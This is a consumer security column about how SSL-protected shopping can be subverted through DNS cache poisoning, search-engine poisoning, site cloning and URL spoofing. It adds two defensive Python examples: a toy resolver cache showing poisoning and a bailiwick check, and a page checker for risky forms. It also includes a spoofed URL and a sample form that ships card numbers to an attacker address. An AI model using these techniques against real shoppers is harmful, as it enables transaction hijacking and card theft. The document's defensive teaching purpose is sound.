Kurt Seifried, a columnist at SecurityPortal.com, recently caused a bit of a stir when he asked the question, "Is SSL [Secure Sockets Layer] Dead?" and provided scenarios by which subverted SSL could allow online transactions to be hijacked.
His article's major point is that SSL is still a useful session-layer encryption protocol. However, SSL is oversold on its ability to secure transactions - that is, to verify that you are who you say you are and that you are really talking to the Web site you intend to buy from. SSL encrypts the channel and, only if you actually check the server certificate, tells you who is at the other end; it says nothing about who is at your end. SSL works, but it is one component of a transaction, and it needs augmentation to ensure the integrity and security of the transaction as a whole.
We are not claiming that there are a lot of instances of bad guys going around SSL to swindle Internet buyers, but we see the opportunities within existing technology and configurations online vendors are using. If Internet commerce continues to grow as predicted, there will be an increased incentive to attempt to hijack transactions and credit card information.
Site redirection
Beware of search engine poisoning. We have seen Webmasters for shady sites successfully redirect traffic to their sites by copying the META tags from popular sites. Once the search engine spiders their site, it has associated the popular site's keywords with the bad guys' site. If you aren't careful about looking at the results of your search engine query, you may select a site that is a dupe of the legitimate one.
DNS redirection. You need only go back to the summer of 1997, when Eugene Kashpureff performed the mother of all DNS hacks and redirected traffic destined for the Internic to his own Alternic.net service. DNS cache poisoning fills a DNS server with incorrect host-name-to-IP-address associations. While under normal circumstances the IP address for Safe-Store.com should be 192.168.1.1, a poisoned DNS server may return 192.168.254.254, which is actually the address of Evil-Store.com. Every user of that server is then sent to the wrong host, no matter how carefully they typed the name.
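The following is an added illustration, not code from the original column, of how a poisoned association gets into a cache. It is a toy model of a resolver cache, with the two addresses from the paragraph above and a constructed zone named evil-store.com; the Record, Response and Cache classes and the run_scenario function are this example's own and stand in for a real resolver. A caching server that accepts whatever extra records an answering server chooses to include (the "additional" section) can be fed a bogus record for Safe-Store.com while it is asking about a completely different name; a server that only keeps records within the zone it actually asked about (a bailiwick check) discards the planted record.

```python
"""Toy model of a DNS cache with and without a bailiwick check.

Added example, not from the original article. The names, addresses and
response contents below are constructed; Record, Response and Cache are a
simplified stand-in for a real resolver, not a real implementation.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

SAFE_ADDR = "192.168.1.1"        # legitimate address of safe-store.com (from the text)
EVIL_ADDR = "192.168.254.254"    # address of evil-store.com (from the text)


@dataclass(frozen=True)
class Record:
    name: str    # owner name, absolute, e.g. "safe-store.com."
    rtype: str   # "A" or "NS"
    data: str    # address or target name


@dataclass
class Response:
    qname: str                                   # the name that was asked about
    zone: str                                    # zone the answering server is authoritative for
    answer: List[Record] = field(default_factory=list)
    additional: List[Record] = field(default_factory=list)


def in_bailiwick(name: str, zone: str) -> bool:
    """True if `name` is `zone` itself or lies below it (absolute, case-insensitive)."""
    name, zone = name.lower(), zone.lower()
    return name == zone or name.endswith("." + zone)


class Cache:
    def __init__(self, bailiwick_check: bool) -> None:
        self.bailiwick_check = bailiwick_check
        self.records: Dict[Tuple[str, str], str] = {}

    def ingest(self, resp: Response) -> None:
        """Store every record in the response; with the check on, drop records the
        answering server has no authority over instead of letting them overwrite
        what is already cached."""
        for rr in resp.answer + resp.additional:
            if self.bailiwick_check and not in_bailiwick(rr.name, resp.zone):
                continue
            self.records[(rr.name.lower(), rr.rtype)] = rr.data

    def lookup(self, name: str, rtype: str = "A") -> Optional[str]:
        return self.records.get((name.lower(), rtype))


def run_scenario(bailiwick_check: bool) -> Optional[str]:
    """Cache the good safe-store.com record, then process an answer about
    evil-store.com that smuggles in a bogus safe-store.com record. Returns what
    the cache afterwards believes safe-store.com's address to be."""
    cache = Cache(bailiwick_check)
    # Step 1: a legitimate answer from safe-store.com's own servers.
    cache.ingest(Response(qname="safe-store.com.", zone="safe-store.com.",
                          answer=[Record("safe-store.com.", "A", SAFE_ADDR)]))
    # Step 2: the victim resolver is induced to look up a name in the attacker's
    # zone; the attacker's server answers and tacks on a record it does not own.
    cache.ingest(Response(qname="www.evil-store.com.", zone="evil-store.com.",
                          answer=[Record("www.evil-store.com.", "A", EVIL_ADDR)],
                          additional=[Record("safe-store.com.", "A", EVIL_ADDR)]))
    return cache.lookup("safe-store.com.")


if __name__ == "__main__":
    print("no bailiwick check :", run_scenario(False))   # poisoned
    print("bailiwick check    :", run_scenario(True))    # still correct
```

The model leaves out TTLs, transaction IDs and the question of which of two competing records a real cache prefers; the point it shows is only that the additional section of an answer is attacker-controlled data, and a cache must decide what to trust from it before storing it.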
Store impersonation. By whatever means the bad guy is able to redirect traffic to his site, he may succeed in capturing transactions by looking like the site you were expecting. This is all too easy - programs that download a complete copy of a Web site are standard tools and very useful for a variety of legitimate reasons. Getting a home page to look exactly like a popular Web site is no problem at all; the look of the page proves nothing about who is serving it.
Things to check
Verify the URL. Does the URL field indicate the site you thought you were going to? Be careful - hackers have learned a URL spoofing trick: constructing a URL long enough that only its rightmost portion fits in the address bar. Thus http://www.bad-guys.com/dir/ https://trading.etrade.com/cgi-bin/gx.cgi/applogic+TradeMain appears to be https://trading.etrade.com/cgi-bin/gx.cgi/applogic+TradeMain in your URL window, even though the browser is talking to www.bad-guys.com. The host you are really connected to is the part between the scheme's "//" and the first following "/"; scroll the address bar to its beginning before trusting what it shows.
Verify that the pages are encrypted. Newer versions of Netscape and Internet Explorer represent encrypted pages with a closed lock. Some online stores jump between secure and unsecured pages often enough that it is important to verify that every screen on which you enter or review critical data is encrypted, not just the first one.
Verify the server certificate. Did you know that by clicking on a secured page's lock, you can retrieve the server's certificate? You can verify that it belongs to the company you expect and that its name matches the site you are on. The certificate will also expose the certificate hierarchy (i.e., who issued the certificate), so you can see which certification authority vouched for it.
Look at the source code of a transaction page. You may consider this the realm of the paranoid, but where is your personal data being posted? If it is a form, is it using a POST or a GET action? Using GET places the field values in the URL itself, even if the page is encrypted. Therefore, a credit card number could show up in a Web server logfile. If the form action appears to be sending your data to an unusual host name or IP address, think twice before committing yourself to the transaction.
Use personal certificates. Technology is now available to obtain and use a digital certificate to authenticate yourself to a server and sign transactions. Unfortunately, this is not widely implemented at online stores, but it is critical to prevent fraud, or to reduce your own personal liability in the event your credit card number is pilfered.
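The first, second and fourth checks in the list above (which host a URL really names, whether the page is encrypted, and where a form sends its data and by which method) can be applied mechanically to a page's source. The following is an added example, not code from the original column: the check_transaction_page function and its findings, the page URL www.safe-store.com/checkout and the two-form HTML page are constructed here to show the checks against one good form and one bad one. Only the certificate check is left out, since it needs the live connection rather than the page source.

```python
"""Mechanical version of three of the 'Things to check': real host of a URL,
page encrypted or not, and each form's method and destination.

Added example, not from the original article. The sample page URL and HTML
are constructed; check_transaction_page and its findings are this example's own.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional
from urllib.parse import urljoin, urlsplit


def real_host(url: str) -> Optional[str]:
    """The host the browser actually connects to: the authority between the
    scheme's '//' and the first '/', whatever the rest of the URL looks like."""
    return urlsplit(url).hostname


class _FormCollector(HTMLParser):
    """Collects the method and action attribute of every <form> on a page."""

    def __init__(self) -> None:
        super().__init__()
        self.forms: List[Dict[str, str]] = []

    def handle_starttag(self, tag, attrs) -> None:
        if tag == "form":
            a = {k: (v or "") for k, v in attrs}
            # Browsers default a form without a method attribute to GET.
            self.forms.append({"method": a.get("method", "GET").upper(),
                               "action": a.get("action", "")})


def check_transaction_page(page_url: str, html: str) -> Dict:
    """Apply the checks to one page; returns the page host, whether it is
    encrypted, the resolved target of every form and a list of findings."""
    page = urlsplit(page_url)
    findings: List[str] = []
    encrypted = page.scheme.lower() == "https"
    if not encrypted:
        findings.append("page is not encrypted (scheme is %s)" % (page.scheme or "none"))

    collector = _FormCollector()
    collector.feed(html)
    forms = []
    for f in collector.forms:
        action_url = urljoin(page_url, f["action"])   # relative actions resolve against the page
        action = urlsplit(action_url)
        if f["method"] == "GET":
            findings.append("form submits with GET to %s: field values end up in the "
                            "URL and in the server log" % action_url)
        if action.scheme.lower() != "https":
            findings.append("form action %s is not encrypted" % action_url)
        if action.hostname != page.hostname:
            findings.append("form action goes to a different host: %s" % action.hostname)
        forms.append({"method": f["method"], "action": action_url, "host": action.hostname})

    return {"host": page.hostname, "encrypted": encrypted,
            "forms": forms, "findings": findings}


# Constructed sample: a legitimate checkout form followed by a planted one
# that ships the card number by GET to the Evil-Store.com address from the text.
SAMPLE_PAGE_URL = "https://www.safe-store.com/checkout"
SAMPLE_HTML = """
<html><body>
<form method="POST" action="/cgi-bin/order">
  <input name="ccnum"><input type="submit" value="Buy">
</form>
<form method="GET" action="http://192.168.254.254/cgi-bin/order">
  <input name="ccnum"><input type="submit" value="Buy">
</form>
</body></html>
"""

if __name__ == "__main__":
    print("real host of the spoofed URL:",
          real_host("http://www.bad-guys.com/dir/ https://trading.etrade.com/cgi-bin/gx.cgi/applogic+TradeMain"))
    for line in check_transaction_page(SAMPLE_PAGE_URL, SAMPLE_HTML)["findings"]:
        print("-", line)
```

The first form produces no findings; the second produces three (GET, unencrypted action, different host). The host comparison is deliberately exact: a form on www.safe-store.com that posts to safe-store.com is flagged too, and a reader who decides that is acceptable should do so consciously rather than have the tool decide.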
There are certainly those who believe we are too extreme in our concerns about the integrity of the current system of Internet financial transactions. The analogy of handing your credit card to a waiter in a restaurant is often put to us. The problem with this analogy is that the Internet is a completely different world: the waiter is one person in one place, while a subverted Web transaction can be carried out at a distance, in volume and without the buyer ever noticing. That world requires a different set of standards for protecting personal privacy.
If you have spent any time on newsgroups or in chat rooms, you know that people behave differently when hiding in anonymity online. This anonymity breaks down social conventions, and we believe it provides greater opportunity and incentive for Internet fraud in the future. The technology and standards need to come together to provide more user-friendly protection to consumers. Until then, be careful out there.
